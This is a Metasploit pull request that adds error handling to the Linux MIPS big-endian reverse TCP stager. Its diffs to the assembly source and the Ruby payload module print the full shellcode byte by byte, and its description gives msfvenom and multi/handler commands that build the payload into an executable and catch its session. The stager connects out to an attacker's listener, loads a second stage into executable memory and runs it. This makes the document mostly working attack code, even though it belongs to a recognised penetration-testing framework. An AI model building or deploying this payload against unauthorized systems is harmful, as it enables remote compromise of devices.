### PR TITLE
add error handling to mipsbe linux reverse tcp stager

### DIFF
--- a/external/source/shellcode/linux/mipsbe/stager_sock_reverse.s
+++ b/external/source/shellcode/linux/mipsbe/stager_sock_reverse.s
@@ -1,11 +1,11 @@
 ##
-# 
+#
 #        Name: stager_sock_reverse
 #        Type: Stager
 #   Qualities: No Nulls out of the IP / Port data
 #   Platforms: Linux MIPS Big Endian
 #     Authors: juan vazquez <juan.vazquez [at] metasploit.com>
-#     License: 
+#     License:
 #
 #        This file is part of the Metasploit Exploit Framework
 #        and is subject to the same licenses and copyrights as
@@ -47,8 +47,9 @@ main:
 	slti    $a2, $zero, -1
 	li      $v0, 4183
 	syscall 0x40404
-	sw      $v0, -4($sp) # store the file descriptor for the socket on the stack
-	
+
+  sw      $v0, -4($sp) # store the file descriptor for the socket on the stack
+
 	# connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.172.1")}, 16)
 	# a0: sockfd
 	# a1: addr = AF_INET (2)
@@ -68,7 +69,7 @@ main:
 	nor     $a2, $t4, $zero
 	li      $v0, 4170
 	syscall 0x40404
-	
+
 	# mmap(0xffffffff, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0)
 	# a0: addr = -1
 	# a1: lenght = 4096
@@ -91,6 +92,7 @@ main:
 	sw      $2, -5($t3)         # Doesn't use $sp directly to avoid nulls
 	li      $v0, 4090
 	syscall 0x40404
+
 	sw      $v0, -8($sp)        # Stores the mmap'ed address on the stack
 
 	# read(sockfd, addr, 4096)
@@ -117,7 +119,7 @@ main:
 	add     $a2, $t1, $0
 	li      $v0, 4147
 	syscall 0x40404
-	
+
 	# jmp to the stage
 	lw      $s1, -8($sp)
 	lw      $s2, -4($sp)

--- a/external/source/shellcode/linux/mipsbe/stager_sock_reverse.s
+++ b/external/source/shellcode/linux/mipsbe/stager_sock_reverse.s
@@ -27,117 +27,117 @@
 #        generate the string to place on:
 #          modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb
 ##
-	.text
-	.align  2
+  .text
+  .align  2
         .globl  main
-	.set    nomips16
+  .set    nomips16
 main:
-	.set    noreorder
-	.set    nomacro
-	# socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
-	# a0: domain = PF_INET (2)
-	# a1: type = SOCK_STREAM (2)
-	# a2: protocol = IPPROTO_IP (0)
-	# v0: syscall = __NR_socket (4183)
-	li      $t7, -6
-	nor     $t7, $t7, $zero
-	addi    $a0, $t7, -3
-	addi    $a1, $t7, -3
-	slti    $a2, $zero, -1
-	li      $v0, 4183
-	syscall 0x40404
+  .set    noreorder
+  .set    nomacro
+  # socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
+  # a0: domain = PF_INET (2)
+  # a1: type = SOCK_STREAM (2)
+  # a2: protocol = IPPROTO_IP (0)
+  # v0: syscall = __NR_socket (4183)
+  li      $t7, -6
+  nor     $t7, $t7, $zero
+  addi    $a0, $t7, -3
+  addi    $a1, $t7, -3
+  slti    $a2, $zero, -1
+  li      $v0, 4183
+  syscall 0x40404
   slt     $s0, $zero, $a3
   bne     $s0, $zero, failed
-	sw      $v0, -4($sp) # store the file descriptor for the socket on the stack
+  sw      $v0, -4($sp) # store the file descriptor for the socket on the stack
 
-	# connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.172.1")}, 16)
-	# a0: sockfd
-	# a1: addr = AF_INET (2)
-	# a2: addrlen = 16
-	# v0: syscall = __NR_connect (4170)
-	lw      $a0, -4($sp)
-	li      $t7, -3
-	nor     $t7, $t7, $zero
-	sw      $t7, -32($sp)
-	lui     $t6, 0x115c
-	sw      $t6, -28($sp)
-	lui     $t6, 0x7f00          # ip
-	ori     $t6, $t6, 0x0001     # ip
-	sw      $t6, -26($sp)
-	addiu   $a1, $sp, -30
-	li      $t4, -17
-	nor     $a2, $t4, $zero
-	li      $v0, 4170
-	syscall 0x40404
+  # connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.172.1")}, 16)
+  # a0: sockfd
+  # a1: addr = AF_INET (2)
+  # a2: addrlen = 16
+  # v0: syscall = __NR_connect (4170)
+  lw      $a0, -4($sp)
+  li      $t7, -3
+  nor     $t7, $t7, $zero
+  sw      $t7, -32($sp)
+  lui     $t6, 0x115c
+  sw      $t6, -28($sp)
+  lui     $t6, 0x7f00          # ip
+  ori     $t6, $t6, 0x0001     # ip
+  sw      $t6, -26($sp)
+  addiu   $a1, $sp, -30
+  li      $t4, -17
+  nor     $a2, $t4, $zero
+  li      $v0, 4170
+  syscall 0x40404
   slt     $s0, $zero, $a3
   bne     $s0, $zero, failed
 
-	# mmap(0xffffffff, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0)
-	# a0: addr = -1
-	# a1: lenght = 4096
-	# a2: prot = PROT_READ|PROT_WRITE|PROT_EXEC (7)
-	# a3: flags = MAP_PRIVATE|MAP_ANONYMOUS (2050)
-	# sp(16): fd = -1
-	# sp(20): offset = 0
-	# v0: syscall = __NR_mmap (4090)
-	li      $a0, -1
-	li      $a1, 4097
-	addi    $a1, $a1, -1
-	li      $t1, -8
-	nor     $t1, $t1, $0
-	add     $a2, $t1, $0
-	li      $a3, 2050
-	li      $t3, -22
-	nor     $t3, $t3, $zero
-	add     $t3, $sp, $t3
-	sw      $0, -1($t3)         # Doesn't use $sp directly to avoid nulls
-	sw      $2, -5($t3)         # Doesn't use $sp directly to avoid nulls
-	li      $v0, 4090
-	syscall 0x40404
+  # mmap(0xffffffff, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0)
+  # a0: addr = -1
+  # a1: lenght = 4096
+  # a2: prot = PROT_READ|PROT_WRITE|PROT_EXEC (7)
+  # a3: flags = MAP_PRIVATE|MAP_ANONYMOUS (2050)
+  # sp(16): fd = -1
+  # sp(20): offset = 0
+  # v0: syscall = __NR_mmap (4090)
+  li      $a0, -1
+  li      $a1, 4097
+  addi    $a1, $a1, -1
+  li      $t1, -8
+  nor     $t1, $t1, $0
+  add     $a2, $t1, $0
+  li      $a3, 2050
+  li      $t3, -22
+  nor     $t3, $t3, $zero
+  add     $t3, $sp, $t3
+  sw      $0, -1($t3)         # Doesn't use $sp directly to avoid nulls
+  sw      $2, -5($t3)         # Doesn't use $sp directly to avoid nulls
+  li      $v0, 4090
+  syscall 0x40404
   slt $s0, $zero, $a3
   bne $s0, $zero, failed
-	sw      $v0, -8($sp)        # Stores the mmap'ed address on the stack
+  sw      $v0, -8($sp)        # Stores the mmap'ed address on the stack
 
-	# read(sockfd, addr, 4096)
-	# a0: sockfd
-	# a1: addr
-	# a2: len = 4096
-	# v0: syscall = __NR_read (4003)
-	lw      $a0, -4($sp)
-	lw      $a1, -8($sp)
-	li      $a2, 4097
-	addi    $a2, $a2, -1
-	li      $v0, 4003
-	syscall 0x40404
+  # read(sockfd, addr, 4096)
+  # a0: sockfd
+  # a1: addr
+  # a2: len = 4096
+  # v0: syscall = __NR_read (4003)
+  lw      $a0, -4($sp)
+  lw      $a1, -8($sp)
+  li      $a2, 4097
+  addi    $a2, $a2, -1
+  li      $v0, 4003
+  syscall 0x40404
   slt $s0, $zero, $a3
   bne $s0, $zero, failed
 
-	# cacheflush(addr, nbytes, DCACHE)
-	# a0: addr
-	# a1: nbytes
-	# a2: cache = DCACHE (2)
-	# v0: syscall = __NR_read (4147)
-	lw      $a0, -8($sp)
-	add     $a1, $v0, $zero
-	li      $t1, -3
-	nor     $t1, $t1, $0
-	add     $a2, $t1, $0
-	li      $v0, 4147
-	syscall 0x40404
+  # cacheflush(addr, nbytes, DCACHE)
+  # a0: addr
+  # a1: nbytes
+  # a2: cache = DCACHE (2)
+  # v0: syscall = __NR_read (4147)
+  lw      $a0, -8($sp)
+  add     $a1, $v0, $zero
+  li      $t1, -3
+  nor     $t1, $t1, $0
+  add     $a2, $t1, $0
+  li      $v0, 4147
+  syscall 0x40404
   slt     $s0, $zero, $a3
   bne     $s0, $zero, failed
-	# jmp to the stage
-	lw      $s1, -8($sp)
-	lw      $s2, -4($sp)
-	jalr    $s1
+  # jmp to the stage
+  lw      $s1, -8($sp)
+  lw      $s2, -4($sp)
+  jalr    $s1
 
 failed:
-	# exit(status)
-	# a0: status
-	# v0: syscall = __NR_exit (4001)
-	li      $a0, 1
-	li      $v0, 4001
-	syscall 0x40404
+  # exit(status)
+  # a0: status
+  # v0: syscall = __NR_exit (4001)
+  li      $a0, 1
+  li      $v0, 4001
+  syscall 0x40404
 
-	.set    macro
-	.set    reorder
+  .set    macro
+  .set    reorder

--- a/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb
@@ -41,6 +41,7 @@ module MetasploitModule
             "\x21\xe5\xff\xfd" +  #  addi    a1,t7,-3
             "\x28\x06\xff\xff" +  #  slti    a2,zero,-1
             "\x24\x02\x10\x57" +  #  li  v0,4183
+            # socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
             "\x01\x01\x01\x0c" +  #  syscall 0x40404
             "\x00\x07\x80\x2a" +  #  slt s0,zero,a3
             "\x16\x00\x00\x36" +  #  bnez    s0,0x4006bc <failed>
@@ -58,6 +59,7 @@ module MetasploitModule
             "\x24\x0c\xff\xef" +  #  li  t4,-17
             "\x01\x80\x30\x27" +  #  nor a2,t4,zero
             "\x24\x02\x10\x4a" +  #  li  v0,4170
+            # connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.172.1")}, 16)
             "\x01\x01\x01\x0c" +  #  syscall 0x40404
             "\x00\x07\x80\x2a" +  #  slt s0,zero,a3
             "\x16\x00\x00\x25" +  #  bnez    s0,0x4006bc <failed>
@@ -74,6 +76,7 @@ module MetasploitModule
             "\xad\x60\xff\xff" +  #  sw  zero,-1(t3)
             "\xad\x62\xff\xfb" +  #  sw  v0,-5(t3)
             "\x24\x02\x0f\xfa" +  #  li  v0,4090
+            # mmap(0xffffffff, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0)
             "\x01\x01\x01\x0c" +  #  syscall 0x40404
             "\x00\x07\x80\x2a" +  #  slt s0,zero,a3
             "\x16\x00\x00\x15" +  #  bnez    s0,0x4006bc <failed>
@@ -83,6 +86,7 @@ module MetasploitModule
             "\x24\x06\x10\x01" +  #  li  a2,4097
             "\x20\xc6\xff\xff" +  #  addi    a2,a2,-1
             "\x24\x02\x0f\xa3" +  #  li  v0,4003
+            # read(sockfd, addr, 4096)
             "\x01\x01\x01\x0c" +  #  syscall 0x40404
             "\x00\x07\x80\x2a" +  #  slt s0,zero,a3
             "\x16\x00\x00\x0c" +  #  bnez    s0,0x4006bc <failed>
@@ -92,6 +96,7 @@ module MetasploitModule
             "\x01\x20\x48\x27" +  #  nor t1,t1,zero
             "\x01\x20\x30\x20" +  #  add a2,t1,zero
             "\x24\x02\x10\x33" +  #  li  v0,4147
+            # cacheflush(addr, nbytes, DCACHE)
             "\x01\x01\x01\x0c" +  #  syscall 0x40404
             "\x00\x07\x80\x2a" +  #  slt s0,zero,a3
             "\x16\x00\x00\x03" +  #  bnez    s0,0x4006bc <failed>
@@ -101,6 +106,7 @@ module MetasploitModule
             # 4006bc <failed>:
             "\x24\x04\x00\x01" +	#  li	a0,1
             "\x24\x02\x0f\xa1" +	#  li	v0,4001
+            # exit(status)
             "\x01\x01\x01\x0c" +	#  syscall	0x40404
             "\x00\x20\x08\x25" +	#  move	at,at
             "\x00\x20\x08\x25"    #  move	at,at

--- a/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb
@@ -104,11 +104,11 @@ module MetasploitModule
             "\x8f\xb2\xff\xfc" +  #  lw  s2,-4(sp)
             "\x02\x20\xf8\x09" +  #  jalr    s1
             # 4006bc <failed>:
-            "\x24\x04\x00\x01" +	#  li	a0,1
-            "\x24\x02\x0f\xa1" +	#  li	v0,4001
+            "\x24\x04\x00\x01" +  #  li	a0,1
+            "\x24\x02\x0f\xa1" +  #  li	v0,4001
             # exit(status)
-            "\x01\x01\x01\x0c" +	#  syscall	0x40404
-            "\x00\x20\x08\x25" +	#  move	at,at
+            "\x01\x01\x01\x0c" +  #  syscall	0x40404
+            "\x00\x20\x08\x25" +  #  move	at,at
             "\x00\x20\x08\x25"    #  move	at,at
         }
       ))

--- a/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb
@@ -9,7 +9,7 @@ require 'msf/core/handler/reverse_tcp'
 
 module MetasploitModule
 
-  CachedSize = 212
+  CachedSize = 272
 
   include Msf::Payload::Stager
   include Msf::Payload::Linux

--- a/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb
@@ -20,7 +20,8 @@ module MetasploitModule
       'Description'   => 'Connect back to the attacker',
       'Author'        =>
         [
-          'juan vazquez'
+          'juan vazquez',
+          'tkmru'
         ],
       'License'       => MSF_LICENSE,
       'Platform'      => 'linux',
@@ -30,26 +31,79 @@ module MetasploitModule
         {
           'Offsets' =>
             {
-              'LHOST' => [ [58, 62], 'ADDR16MSB' ],
-              'LPORT' => [ 50, 'n'    ],
+              'LHOST' => [ [66, 70], 'ADDR16MSB' ],
+              'LPORT' => [ 58, 'n' ],
             },
           'Payload' =>
-            "\x24\x0f\xff\xfa\x01\xe0\x78\x27\x21\xe4\xff\xfd\x21\xe5" +
-            "\xff\xfd\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c" +
-            "\xaf\xa2\xff\xfc\x8f\xa4\xff\xfc\x24\x0f\xff\xfd\x01\xe0" +
-            "\x78\x27\xaf\xaf\xff\xe0\x3c\x0e\x11\x5c\xaf\xae\xff\xe4" +
-            "\x3c\x0e\x7f\x00\x35\xce\x00\x01\xaf\xae\xff\xe6\x27\xa5" +
-            "\xff\xe2\x24\x0c\xff\xef\x01\x80\x30\x27\x24\x02\x10\x4a" +
-            "\x01\x01\x01\x0c\x24\x04\xff\xff\x24\x05\x10\x01\x20\xa5" +
-            "\xff\xff\x24\x09\xff\xf8\x01\x20\x48\x27\x01\x20\x30\x20" +
-            "\x24\x07\x08\x02\x24\x0b\xff\xea\x01\x60\x58\x27\x03\xab" +
-            "\x58\x20\xad\x60\xff\xff\xad\x62\xff\xfb\x24\x02\x0f\xfa" +
-            "\x01\x01\x01\x0c\xaf\xa2\xff\xf8\x8f\xa4\xff\xfc\x8f\xa5" +
-            "\xff\xf8\x24\x06\x10\x01\x20\xc6\xff\xff\x24\x02\x0f\xa3" +
-            "\x01\x01\x01\x0c\x8f\xa4\xff\xf8\x00\x40\x28\x20\x24\x09" +
-            "\xff\xfd\x01\x20\x48\x27\x01\x20\x30\x20\x24\x02\x10\x33" +
-            "\x01\x01\x01\x0c\x8f\xb1\xff\xf8\x8f\xb2\xff\xfc\x02\x20" +
-            "\xf8\x09"
+            "\x24\x0f\xff\xfa" +  #  li  t7,-6
+            "\x01\xe0\x78\x27" +  #  nor t7,t7,zero
+            "\x21\xe4\xff\xfd" +  #  addi    a0,t7,-3
+            "\x21\xe5\xff\xfd" +  #  addi    a1,t7,-3
+            "\x28\x06\xff\xff" +  #  slti    a2,zero,-1
+            "\x24\x02\x10\x57" +  #  li  v0,4183
+            "\x01\x01\x01\x0c" +  #  syscall 0x40404
+            "\x00\x07\x80\x2a" +  #  slt s0,zero,a3
+            "\x16\x00\x00\x36" +  #  bnez    s0,0x4006bc <failed>
+            "\xaf\xa2\xff\xfc" +  #  sw  v0,-4(sp)
+            "\x8f\xa4\xff\xfc" +  #  lw  a0,-4(sp)
+            "\x24\x0f\xff\xfd" +  #  li  t7,-3
+            "\x01\xe0\x78\x27" +  #  nor t7,t7,zero
+            "\xaf\xaf\xff\xe0" +  #  sw  t7,-32(sp)
+            "\x3c\x0e\x11\x5c" +  #  lui t6,0x115c
+            "\xaf\xae\xff\xe4" +  #  sw  t6,-28(sp)
+            "\x3c\x0e\x7f\x00" +  #  lui t6,0x7f00
+            "\x35\xce\x00\x01" +  #  ori t6,t6,0x1
+            "\xaf\xae\xff\xe6" +  #  sw  t6,-26(sp)
+            "\x27\xa5\xff\xe2" +  #  addiu   a1,sp,-30
+            "\x24\x0c\xff\xef" +  #  li  t4,-17
+            "\x01\x80\x30\x27" +  #  nor a2,t4,zero
+            "\x24\x02\x10\x4a" +  #  li  v0,4170
+            "\x01\x01\x01\x0c" +  #  syscall 0x40404
+            "\x00\x07\x80\x2a" +  #  slt s0,zero,a3
+            "\x16\x00\x00\x25" +  #  bnez    s0,0x4006bc <failed>
+            "\x24\x04\xff\xff" +  #  li  a0,-1
+            "\x24\x05\x10\x01" +  #  li  a1,4097
+            "\x20\xa5\xff\xff" +  #  addi    a1,a1,-1
+            "\x24\x09\xff\xf8" +  #  li  t1,-8
+            "\x01\x20\x48\x27" +  #  nor t1,t1,zero
+            "\x01\x20\x30\x20" +  #  add a2,t1,zero
+            "\x24\x07\x08\x02" +  #  li  a3,2050
+            "\x24\x0b\xff\xea" +  #  li  t3,-22
+            "\x01\x60\x58\x27" +  #  nor t3,t3,zero
+            "\x03\xab\x58\x20" +  #  add t3,sp,t3
+            "\xad\x60\xff\xff" +  #  sw  zero,-1(t3)
+            "\xad\x62\xff\xfb" +  #  sw  v0,-5(t3)
+            "\x24\x02\x0f\xfa" +  #  li  v0,4090
+            "\x01\x01\x01\x0c" +  #  syscall 0x40404
+            "\x00\x07\x80\x2a" +  #  slt s0,zero,a3
+            "\x16\x00\x00\x15" +  #  bnez    s0,0x4006bc <failed>
+            "\xaf\xa2\xff\xf8" +  #  sw  v0,-8(sp)
+            "\x8f\xa4\xff\xfc" +  #  lw  a0,-4(sp)
+            "\x8f\xa5\xff\xf8" +  #  lw  a1,-8(sp)
+            "\x24\x06\x10\x01" +  #  li  a2,4097
+            "\x20\xc6\xff\xff" +  #  addi    a2,a2,-1
+            "\x24\x02\x0f\xa3" +  #  li  v0,4003
+            "\x01\x01\x01\x0c" +  #  syscall 0x40404
+            "\x00\x07\x80\x2a" +  #  slt s0,zero,a3
+            "\x16\x00\x00\x0c" +  #  bnez    s0,0x4006bc <failed>
+            "\x8f\xa4\xff\xf8" +  #  lw  a0,-8(sp)
+            "\x00\x40\x28\x20" +  #  add a1,v0,zero
+            "\x24\x09\xff\xfd" +  #  li  t1,-3
+            "\x01\x20\x48\x27" +  #  nor t1,t1,zero
+            "\x01\x20\x30\x20" +  #  add a2,t1,zero
+            "\x24\x02\x10\x33" +  #  li  v0,4147
+            "\x01\x01\x01\x0c" +  #  syscall 0x40404
+            "\x00\x07\x80\x2a" +  #  slt s0,zero,a3
+            "\x16\x00\x00\x03" +  #  bnez    s0,0x4006bc <failed>
+            "\x8f\xb1\xff\xf8" +  #  lw  s1,-8(sp)
+            "\x8f\xb2\xff\xfc" +  #  lw  s2,-4(sp)
+            "\x02\x20\xf8\x09" +  #  jalr    s1
+            # 4006bc <failed>:
+            "\x24\x04\x00\x01" +	#  li	a0,1
+            "\x24\x02\x0f\xa1" +	#  li	v0,4001
+            "\x01\x01\x01\x0c" +	#  syscall	0x40404
+            "\x00\x20\x08\x25" +	#  move	at,at
+            "\x00\x20\x08\x25"    #  move	at,at
         }
       ))
   end


### PR DESCRIPTION
I add error handling to mipsbe linux reverse tcp. for [Linux reverse_tcp stager segfaults when it can't connect · Issue #7722 · rapid7/metasploit-framework](https://github.com/rapid7/metasploit-framework/issues/7722).

## Verification

List the steps needed to make sure this thing works

- [ ] ./msfconsole -qx "use exploit/multi/handler; set payload linux/mipsbe/shell/reverse_tcp; set lhost ip_addr; set lport port; set ExitOnSession false; run -j"
- [ ] follow commands
```
$ ./msfvenom -p linux/mipsbe/shell/reverse_tcp LHOST=10.0.2.2 LPORT=4444 -f elf -o ./reverse_tcp.elf
$ sudo chmod +x ./reverse_tcp.elf
$ strace ./reverse_tcp.elf 
execve("./reverse_tcp.elf", ["./reverse_tcp.elf"], [/* 14 vars */]) = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("127.0.0.1")}, 16) = -1 ECONNREFUSED (Connection refused)
exit(1)          
```